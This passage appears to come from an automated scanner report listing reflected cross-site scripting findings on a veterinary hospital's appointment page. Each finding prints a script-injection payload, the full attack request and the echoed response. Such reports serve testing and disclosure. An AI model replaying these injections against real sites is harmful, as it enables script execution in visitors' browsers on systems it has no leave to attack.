tin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compat
ible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=a4vbafvn3edv5idqhqabu1vbf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM9c93b"><script>alert(1)</script>6aa43ad2da9&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york
...[SNIP]...

2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75d4"><script>alert(1)</script>ec5002bcf17 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AMd75d4"><script>alert(1)</script>ec5002bcf17&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=utsbm26ngjhc03ls4mkecbg4h6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AMd75d4"><script>alert(1)</script>ec5002bcf17&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterina
...[SNIP]...

2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the appt_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd652"><script>alert(1)</script>e99070fd4e0 was submitted in the appt_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1toj3kbv807ruru63hn2ttm475; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&sub
...[SNIP]...

2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd70d"><script>alert(1)</script>a6d35f88597 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=euqdou5q6pfmhvgk2m2b42b3p0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+
...[SNIP]...

2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the date1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c1c6"><script>alert(1)</script>979dba9c0db was submitted in the date1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=8c1c6"><script>alert(1)</script>979dba9c0db&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=gn0lqn96h1dui1eed4jku5k8m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="date1" id="date1" type="text" size="20" maxlength="50" value="8c1c6"><script>alert(1)</script>979dba9c0db" class="datepicker" />
...[SNIP]...

2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the date2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96695"><script>alert(1)</script>9ca6b41fe54 was submitted in the date2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=96695"><script>alert(1)</script>9ca6b41fe54&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=m28f2rol7ucndmddriq23vq4j7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="date2" id="date2" type="text" size="20" maxlength="50" value="96695"><script>alert(1)</script>9ca6b41fe54" class="datepicker" />
...[SNIP]...

2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the date3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fca"><script>alert(1)</script>838dd1f40b2 was submitted in the date3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=99fca"><script>alert(1)</script>838dd1f40b2&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4slqhv122b9dscf15gqhml0ng4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="date3" id="date3" type="text" size="20" maxlength="50" value="99fca"><script>alert(1)</script>838dd1f40b2" class="datepicker" />
...[SNIP]...

2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the doctor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23546"><script>alert(1)</script>3e62334127d was submitted in the doctor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

